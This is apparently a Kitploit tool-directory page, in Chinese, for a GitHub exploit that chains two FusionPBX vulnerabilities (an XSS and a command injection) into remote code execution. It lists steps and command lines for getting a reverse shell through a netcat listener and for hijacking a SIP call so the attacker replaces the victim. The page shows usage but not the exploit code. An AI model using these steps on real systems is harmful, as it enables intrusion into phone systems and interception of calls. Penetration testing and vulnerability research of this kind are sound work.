Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
fusionpbx_rce_vulnerability — 连环利用 CVE-2019-11408 – 操作面板中的XSS漏洞 和 CVE-2019-11409 – 操作面板中的命令注入漏洞。 | Kitploit
工具/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

连环利用 CVE-2019-11408 – 操作面板中的XSS漏洞 和 CVE-2019-11409 – 操作面板中的命令注入漏洞。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
22年前尚未审核
分享

前言

这段简单的代码试图完整实现由Dustin Cobb在使用来电显示实现RCE – FusionPBX的多个漏洞中介绍的链式漏洞。

远程代码执行

复现步骤

  1. 在Web浏览器中查看存在漏洞的操作员屏幕,本例位于 https://{fusionpbx_address}/app/operator_panel/index.php
  2. 在远程系统(rce_listener_address)上启动一个netcat监听器.x`
  3. 在远程系统的另一个终端窗口中运行下面的漏洞利用代码 python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. 漏洞利用代码将连接到netcat监听器并提供一个反向Shell

替换通话

当我们知道一个通话的Call-ID、from-tag和to-tag时,运行下面的代码将把您替换为通话中的受害者。

复现步骤

  1. 首先在两个SIP用户代理之间发起一个通话。
  2. 通话建立后,我们需要通过连接 {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag} 来构造dialog_identifier。
  • 在远程系统上运行下面的劫持代码,用受害者号码替换您。 python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
  • 下载工具